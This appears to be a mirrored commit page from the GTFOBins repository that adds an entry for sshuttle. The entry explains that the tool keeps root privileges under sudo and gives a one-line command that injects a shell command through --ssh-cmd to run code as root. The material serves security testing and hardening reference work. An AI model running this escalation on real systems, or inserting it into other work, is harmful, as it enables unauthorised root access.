mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-20 23:01:33 +01:00
Merge 11c69d5497c18d783118410b35df76616069c88d into b29f2cfde1c72e4ea5191e49604e923bbda98461
This commit is contained in:
commit
5395cad76d
7
_gtfobins/sshuttle.md
Normal file
7
_gtfobins/sshuttle.md
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id
|
||||
code: |
|
||||
sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3
|
||||
---
|
||||
Loading…
Reference in New Issue
Block a user